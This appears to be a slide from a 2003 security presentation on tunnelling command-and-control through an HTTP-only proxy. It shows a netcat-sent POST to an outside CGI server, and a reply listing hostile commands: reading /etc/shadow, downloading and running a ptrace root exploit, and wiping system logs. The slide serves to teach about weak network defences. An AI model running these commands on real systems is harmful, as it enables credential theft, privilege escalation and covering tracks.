All locked down.

Now that only true HTTP is allowed, we're safe, right?

    $ nc proxy 3128
    POST http://home.my_server.net/cgi-bin/runcommands.cgi HTTP/1.1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/4.0 (compatible; ...)
    Host: home.my_server.net
    Connection: Keep-Alive
    Cache-Control: no-cache
    Content-Length: 83

    uname=Linux+testy+2.4.10-bf2.4+%231+Son+Apr+14+09%3a53%3acpu= 686&cpuspeed=731&memfree=103727

    shadow     now  cat /etc/shadow
    ptracebug  now  cd /tmp; wget ...ptracebug.c; make ptracebug; ./ptracebug && echo r00ted
    clearlogs  10m  /tmp/.../newsudo cat /dev/null > /var/log/messages

Copyright 2003, Bri Hatch of Onsight, Inc.
Presented at SecureWorld Expo, 2003.
Presentation created using vim and MagicPoint.